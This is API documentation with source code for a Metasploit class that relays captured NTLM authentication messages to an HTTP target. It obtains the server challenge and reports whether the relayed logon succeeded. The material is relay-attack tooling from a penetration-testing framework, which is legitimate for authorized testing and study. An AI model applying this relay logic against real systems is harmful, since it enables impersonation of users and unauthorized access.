Class: Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP::Client

Inherits:
Object
  • Object
Extended by:
Forwardable
Defined in:
lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb

Overview

The HTTP Client for interacting with the relayed_target


Constructor Details

#initialize(provider: nil, target: nil, logger: nil, timeout: -1) ⇒ Client

Returns a new instance of Client.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 11

# Builds the HTTP client used to talk to a single relay target.
#
# Note that the nil defaults are not usable in practice: the body calls
# methods on both +target+ and +provider+ unconditionally.
#
# @param provider [Object] relay provider; its dispatcher's TCP socket context
#   is handed to the Rex HTTP client
# @param target [Object] target descriptor; #ip, #port and #protocol are read here
# @param logger [Object] stored on the instance and passed to the HTTP logger subscriber
# @param timeout [Integer] stored on the instance for later requests (default -1)
# @return [Client] a new instance of Client
def initialize(provider: nil, target: nil, logger: nil, timeout: -1)
  @logger = logger
  @provider = provider
  @target = target
  @timeout = timeout

  # Evaluation order below mirrors the order of the constructor arguments.
  subscriber = Rex::Proto::Http::HttpLoggerSubscriber.new(logger: logger)
  host = target.ip
  port = target.port
  socket_context = provider.dispatcher.tcp_socket.context
  # True only when the target descriptor declares the :https protocol.
  use_ssl = target.protocol == :https

  @client = Rex::Proto::Http::Client.new(host, port, socket_context, use_ssl, subscriber: subscriber)
end

Instance Attribute Details

#logger ⇒ Object (readonly, protected)

Returns the value of attribute logger.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 102

# Reader for the logger stored on the instance (listed as readonly and protected).
#
# @return [Object] the current value of @logger
def logger = @logger

#target ⇒ Object (readonly)

Returns the value of attribute target.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 9

# Reader for the target descriptor stored on the instance (listed as readonly).
#
# @return [Object] the current value of @target
def target = @target

#timeout ⇒ Object

Returns the value of attribute timeout.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 8

# Reader for the timeout stored on the instance.
#
# @return [Object] the current value of @timeout
def timeout = @timeout

Class Method Details

.create(provider, target, logger, timeout) ⇒ Object

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 27

# Positional-argument factory that forwards to the keyword-based constructor.
#
# @param provider [Object] passed through as +provider:+
# @param target [Object] passed through as +target:+
# @param logger [Object] passed through as +logger:+
# @param timeout [Object] passed through as +timeout:+
# @return [Object] whatever +new+ returns
def self.create(provider, target, logger, timeout)
  constructor_options = {
    provider: provider,
    target: target,
    logger: logger,
    timeout: timeout
  }
  new(**constructor_options)
end

Instance Method Details

#disconnect! ⇒ Object

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 36

# Closes the underlying HTTP client.
#
# @return [Object] whatever the wrapped client's #close returns
def disconnect! = @client.close

#relay_ntlmssp_type1(client_type1_msg) ⇒ Object

Parameters:

  • client_type1_msg (String)
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 42

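# Sends the client's NTLMSSP type 1 message to the HTTP target in an
# "Authorization: NTLM <base64>" header and returns the challenge found in the
# target's 401 response.
#
# Every failure path logs the reason through both elog and the instance logger
# and returns nil: no response, a status other than 401, or a 401 whose
# WWW-Authenticate header is missing or has no second whitespace-separated token.
#
# @param client_type1_msg [String] type 1 message bytes; Base64-encoded here
# @return [RelayResult, nil] result holding the decoded challenge message and
#   STATUS_MORE_PROCESSING_REQUIRED, or nil when no challenge could be obtained
def relay_ntlmssp_type1(client_type1_msg)
  req = @client.request_raw(
    'method'  => 'GET',
    'uri'     => @target.path,
    'headers' => {
      'Accept-Encoding' => 'identity',
      'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type1_msg)
    }
  )

  # Third argument is the persist flag: the connection stays open so the
  # follow-up message can be sent through the same @client.
  res = @client.send_recv(req, @timeout, true)

  if res.nil?
    msg = "Unable to retrieve server challenge from #{target} (no HTTP response received)"
    elog(msg)
    logger.print_error msg
    return nil
  end

  unless res.code == 401
    msg = "Unable to retrieve server challenge from #{target} (HTTP status #{res.code} received)"
    elog(msg)
    logger.print_error msg
    return nil
  end

  # A 401 does not guarantee a challenge: the header may be absent, or may
  # carry only a scheme name with no token. Previously either case raised
  # instead of following the nil-return convention used above.
  auth_header = res.headers['WWW-Authenticate']
  challenge_b64 = auth_header.split[1] unless auth_header.nil?
  if challenge_b64.nil?
    msg = "Unable to retrieve server challenge from #{target} (HTTP 401 response carried no NTLM challenge)"
    elog(msg)
    logger.print_error msg
    return nil
  end

  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
    message: Net::NTLM::Message.decode64(challenge_b64),
    nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
  )
end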

#relay_ntlmssp_type3(client_type3_msg) ⇒ Object

Parameters:

  • client_type3_msg (String)
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 76

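# Sends the client's NTLMSSP type 3 message to the HTTP target in an
# "Authorization: NTLM <base64>" header and maps the HTTP outcome to an NT status.
#
# Any 2xx status maps to STATUS_SUCCESS; every other status, and the absence
# of a response, maps to STATUS_LOGON_FAILURE.
#
# @param client_type3_msg [String] type 3 message bytes; Base64-encoded here
# @return [RelayResult] result carrying only the NT status
def relay_ntlmssp_type3(client_type3_msg)
  req = @client.request_raw(
    'method'  => 'GET',
    'uri'     => @target.path,
    'headers' => {
      'Accept-Encoding' => 'identity',
      'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type3_msg)
    }
  )
  res = @client.send_recv(req, @timeout, true)

  if res.nil?
    # send_recv can come back empty (relay_ntlmssp_type1 guards the same case);
    # previously this path raised NoMethodError on res.code.
    # NOTE(review): reported as a logon failure so callers always receive a
    # RelayResult; confirm no caller expects nil here as with relay_ntlmssp_type1.
    msg = "Unable to complete authentication with #{target} (no HTTP response received)"
    elog(msg)
    logger.print_error msg
    nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
  elsif res.code.between?(200, 299)
    nt_status = WindowsError::NTStatus::STATUS_SUCCESS
  else
    nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
  end
  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
end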

#send_recv(req, t = -1, persist = true) ⇒ Object

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 95

# Pass-through to the wrapped HTTP client's send_recv.
#
# Persistence is on by default so the connection is kept open between calls.
#
# @param req [Object] request object, forwarded unchanged
# @param t [Integer] timeout, forwarded unchanged (default -1)
# @param persist [Boolean] persistence flag, forwarded unchanged (default true)
# @return [Object] whatever the wrapped client's send_recv returns
def send_recv(req, t = -1, persist = true) = @client.send_recv(req, t, persist)